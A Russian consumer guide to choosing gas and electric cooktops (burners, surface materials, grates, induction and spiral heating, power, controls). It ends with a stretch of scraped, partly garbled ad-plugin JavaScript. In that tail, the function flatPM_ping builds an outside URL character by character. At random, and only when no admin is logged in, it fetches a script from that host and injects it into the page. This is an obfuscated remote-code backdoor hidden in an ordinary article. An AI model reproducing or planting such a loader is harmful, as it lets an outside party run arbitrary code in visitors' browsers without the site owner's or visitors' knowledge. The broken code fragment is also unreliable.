Таблица сравнения

Как выбрать и на что обратить внимание?

Количество конфорок

Сколько брать конфорок, решать клиенту, из учёта, на сколько человек приобретается техника.

Для большой семьи подойдут четыре или пять конфорок, а для маленькой из трех человек подойдёт две или три. Иногда производители комбинируют газ и электричество в своих моделях.

Многие приборы имеют специально разработанный дизайн, чтобы расположение конфорок было достаточно комфортным для покупателя.

Материал рабочей поверхности

Самое распространенное покрытие поверхности — из стеклокерамики, которая обладает стильным дизайном и подходит для любого интерьера.

Эмаль подойдёт для ретро-стиля. Закаленное стекло стоит дороже стеклокерамики и эмали, но лучше чувствует себя в эксплуатации.

Эмаль со временем может царапаться и повреждаться.

Решетки

Чугунные или стальные, в отношении стальных отмечается — дешёвая цена, лёгкость очищения. Но сталь провисает под весом утвари, и деформируется. Чугун более долговечен, но дорог. Очищается легко, если не запускать.

Размеры

Габариты выбранной панели зависят от размеров кухни и столешницы. Перед приобретением стоит измерить столешницу и выбранное место для панели.

Дополнительные функции

5 советов специалиста по выбору

Вот некоторые рекомендации от специалистов по выбору газовой варочной панели:

  • материал панели — газовая панель имеет множество цветов рабочей поверхности и интересные моменты дизайна. Основными материалами отмечается эмаль, нержавейка и стеклокерамика. На последней могут оставаться разводы;
  • материал решеток — выбирая чугунные решетки, стоит помнить о степени прилипания пищи и загрязнений. Но чугун прослужит дольше, чем сталь. Стальные решетки более дешевые, но при длительной эксплуатации решетки могут провисать и деформироваться;
  • конфорки — присутствуют виды экспресс-конфорок, wok и с тройной короной. Такие конфорки обеспечивают более быстрый нагрев и наименьшие потери газа;
  • размеры — данная деталь полностью зависит от потребностей и возможности пространства, в которое приобретается панель. Техника должна гармонично вписываться в интерьер и не занимать много места;
  • дополнительные функции — многие приборы оснащены газ-контролем и электроподжигом. Первая функция необходимая, если пролить на конфорку воду или молоко, то подача газа прекращается и предохраняет владельца от пожара.

Как выбрать электрическую варочную панель (2018)

Варочные панели, как и остальная встроенная техника, появились на наших кухнях относительно недавно и сразу завоевали высокую популярность. И дело не только в эстетическом превосходстве варочных панелей – освободившись от громоздкой духовки, независимые варочные панели позволили намного эффективнее использовать пространство рядом с рабочим треугольником кухни «плита-равковина-холодильник».

Духовка, как правило, используется значительно реже плиты, поэтому размещение вместо духовки под варочной плитой шкафа с кухонной техникой или часто использующимися продуктами может оптимизировать процесс приготовления пищи.

Магазины бытовой техники сегодня предоставляют большой выбор варочных панелей на любой вкус и кошелек. Но прежде чем идти в магазин за покупкой, следует разобраться в характеристиках варочных панелей, и первое, с чего следует начать, выбрать её вид: газовый или электрический.

Зачастую выбора как такого и нет, если у вас в квартире отсутствует газ (что в современных высотных домах это совсем не редкость).

Но если газ подведен, а экономичность и скорость приготовления блюд вам важнее безопасности и эстетических качеств – выбирайте среди газовых варочных панелей.

Характеристики электрических варочных панелей

Встраиваемая техника обычно дороже отдельностоящей, зато предоставляет куда больше возможностей по улучшению дизайна. К варочным панелям это тоже относится, поэтому на цвет панели следует обратить самое пристальное внимание – подойдет ли он к интерьеру кухни, не будет ли портить дизайн резким контрастом.

Обратите также внимание на габариты панели и на то, как она «вписывается» в столешницу и в кухню в целом.

Если мощные конфорки на панели расположены со стороны стены, отодвиньте панель подальше от стены, иначе тепло будет распространяться на фартук кухни и на плинтус. Если фартук и плинтус пластиковые, то при включении близко расположенной конфорки на полную мощность, они могут деформироваться и даже загореться.

Определитесь с высотой панели – сама по себе варочная поверхность обычно имеет высоту менее сантиметра, но под ней располагаются различные электрические элементы и общая высота панели может превышать 10 см – убедитесь, что под панелью отведено достаточно места.

Количество конфорок зависит от состава семьи, от частоты готовки и от разнообразия одновременно приготавливаемых блюд.

— Панель с двумя конфорками можно порекомендовать для маленьких семей. Для небольшой кухни это оптимальный вариант — стоят они недорого и места на столешнице занимают немного.

— Панель с тремя конфорками – компромиссный вариант, когда столешница кухни невелика, но двух конфорок для приготовления обеда уже недостаточно. Она может иметь ширину на 10-15 см меньшую, чем четырехконфорочные, и быть оптимальным вариантом для семьи из 2-4 человек.

— Панель с четырьмя конфорками – самый распространенный и наиболее привычный нам вариант. Но задумайтесь: как часто вы видели, чтобы на плите работали одновременно 4 конфорки? «Горят» обычно максимум 2-3, а остальные используются в лучшем случае как подставки под готовые блюда.

Если вы не хотите покупать подставку под кастрюлю стоимостью в четверть цены панели, обратите внимание на плиты с расширенным функционалом – например, если одна из конфорок овальная и позволяет готовить блюда в нестандартной посуде.

Некоторые четырехконфорочные панели могут объединять рядом распложенные конфорки в одну большую овальную зону нагрева – это тоже увеличивает функциональность.

Также можно рассмотреть вариант с конфорками различного вида – 2 индукционных и 2 тепловых конфорки на одной плите позволят пользоваться преимуществами обоих видов посуды.

Пяти- и шестиконфорочные панели подойдут для больших кухонь с просторными столешницами. В пятиконфорочных панелях чаще всего есть одна конфорка повышенной мощности, в шестиконфорочных конфорки можно объединять попарно в большие овальные зоны. Такие панели подойдут для готовки большого количества пищи в крупных кастрюлях и посуде нестандартной формы.

Материал изготовления панели влияет как на её внешний вид, так и на функциональность, удобство использования и, разумеется, цену.

Эмалированная сталь – самый бюджетный вариант. Несмотря на невысокую стоимость, в некоторых вариантах оформления кухни такая панель может выглядеть вполне органично. Но помните – эмаль легко царапается, поэтому её блеск может быстро сойти на нет.

— Панели из нержавеющей стали тоже стоят недорого, такой материал современнее, но он накладывает некоторые требования к дизайну кухни. В кухнях, выполненных в стиле модерн или техно, такая панель будет хорошо смотреться. А вот в кухне стиля ампир нержавеющая сталь будет не совсем к месту.

Поверхность панели из нержвающей стали немного более устойчива к царапинам, чем эмалированная, но на ней хорошо видны потеки воды, капли жира и даже отпечатки пальцев – вытирать её придется чаще.

Стеклокерамика сегодня является самым распространенным материалом электрических варочных панелей благодаря великолепному внешнему виду и эксплуатационным характеристикам.

Стеклокерамика обладает низкой теплопроводностью, что позволяет «спрятать» нагревательные элементы под сплошной гладкой поверхностью – при включении нагревателей нагреется только участок над ними.

Стеклокерамика может быть не только черной, в продаже встречаются панели различных цветов и даже с нанесением рисунка. Возможности для дизайнеров открываются богатейшие.

Главный недостаток стеклокерамики – её хрупкость. Неосторожно поставленная кастрюля, упавший нож, вода, попавшая на раскаленную конфорку – все это может привести к раскалыванию поверхности и потребует полной её замены.

На краях стеклокерамической панели при неосторожном обращении появляются сколы, которые хоть и не приводят к поломке всей панели, но внешний вид портят.

Некоторые варочные панели имеют металлическую рамку, защищающую край панели от сколов, но такая рамка, во-первых, затрудняет чистку плиты, а во-вторых, не дает пользоваться посудой, выступающей за габариты панели – особенно это важно для узких двухконфорочных панелей.

Кроме того, стеклокерамика требует тщательного ухода и своевременного удаления пригоревшей пищи.

Закаленное стекло обладает теми же преимуществами и недостатками, что и стеклокерамика, разве что немного прочнее и устойчивее к температурным перепадам.

Материал изготовления конфорок.

Чугунные «блины» применяются на недорогих варочных панелях из эмалированной и нержавеющей стали. Невысокая стоимость является единственным их преимуществом. Выглядят они довольно архаично, долго разогреваются, долго остывают и потребляют много электроэнергии.

Греющая поверхность из нержавеющей стали применяется на некоторых специализированных плитах, позволяющих производить готовку прямо на поверхности плиты, без посуды.

У стеклокерамических варочных панелей визуальная граница между поверхностью и конфоркой зачастую отсутствует, но главное у такой конфорки не её поверхность, а то, что под ней скрыто – индукционная катушка или спиральный нагреватель.

Индукционные конфорки не нагревают поверхность, они при помощи магнитной индукции греют непосредственно посуду в зоне контакта с конфоркой. Это накладывает некоторые требования к используемой посуде – она должна быть изготовлена из ферромагнитного металла и иметь плоское дно.

Индукционные конфорки наиболее экономичны и безопасны – поверхность панели остается совершенно холодной до тех пор, пока на нее не будет поставлена специальная посуда. Кроме того, поскольку они не греют саму поверхность, она уже не так боится попадания холодной воды в процессе готовки. Хотя она, конечно, все равно нагревается от контакта с горячей посуды, но намного меньше.

Спиральный нагреватель намного дешевле индукционного и не накладывает никаких особых требований к посуде, кроме того, что диаметр дна посуды не должен быть меньше диаметра самой спирали, иначе в конфорке образуется температурный перепад, да и часть спирали будет греть воздух, впустую расходуя электроэнергию. Зачастую спиральные конфорки имеют несколько концентрических контуров, включая или отключая которые можно менять площадь подогрева.

Некоторые панели имеют функцию автовыбора ширины зоны нагрева и способны сами задействовать столько контуров, сколько необходимо, исходя из площади дна поставленной на конфорку посуды.

Также из недостатков следует отметить опасность остаточного нагрева – хоть стеклокерамика нагревается и остывает довольно быстро, некоторое время поверхность еще остается горячей после прекращения свечения спирали. В этот момент она никак визуально не отличается от холодной, что может привести к ожогу или повреждению плиты из-за попадания на неё холодной воды.

Чтобы избежать этой опасности, выбирайте модели с индикатором остаточного нагрева и не забывайте смотреть на него, прежде чем что-то делать с панелью.

Мощность подключения определяет максимальную потребляемую мощность панели. На этот параметр следует обратить внимание перед подключением панели. Некоторые из них потребляют в максимуме до 12 кВт, что может потребовать установки мощного автомата защиты и прокладки отдельной линии питания.

Разные конфорки потребляют различную мощность, обычно она связана с площадью конфорки – чем больше площадь, тем она мощнее. На некоторых панелях предусмотрены экспресс-конфорки повышенной мощности, они производят нагрев быстрее остальных.

Количество уровней мощности показывает, сколько у панели существует ступеней нагрева. Чем больше это количество, тем точнее можно выставить температуру конфорки.

Вид управления.

На недорогих эмалированных и стальных панелях управление степенью нагрева и прочими функциями производится с помощью привычных поворотных ручек.

На стеклокерамических панелях управление может быть сенсорным, механическим – с помощью тех же ручек и совмещенным – когда нагрев регулируется поворотными ручками, а другие функции – сенсорными кнопками. Давать твердые рекомендации здесь сложно, предпочтения у всех свои. Следует лишь отметить, что сенсорные элементы управления намного проще поддерживать в чистоте.

Варианты выбора электрических варочных панелей

Если вам нужна варочная панель для маленькой кухни и маленькой семьи, выбирайте среди [url=»https://www.dns-shop.ru/catalog/17a8d0b816404e77/varochnye-paneli-elektricheskie/?p=1&i=1&mode=list&stock=2&order=1&f=rws]двухконфорочных панелей. Если однажды вам перестанет её хватать, можно будет просто установить еще одну такую же.

Если у вас в семье 2-4 человека, а размер столешницы вашей кухни невелик, обратите внимание на трехконфорочные панели – они уже полноразмерных, но их возможностей уже вполне достаточно для большинства случаев.

[url=»https://www.dns-shop.ru/catalog/17a8d0b816404e77/varochnye-paneli-elektricheskie/?p=1&mode=list&f=rvh-rvj]Стеклокерамическая или стеклянная варочная поверхность может стать одним из центральных элементов дизайна вашей кухни.

Если вы готовы платить за безопасность и экономичность, выбирайте среди индукционных варочных панелей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика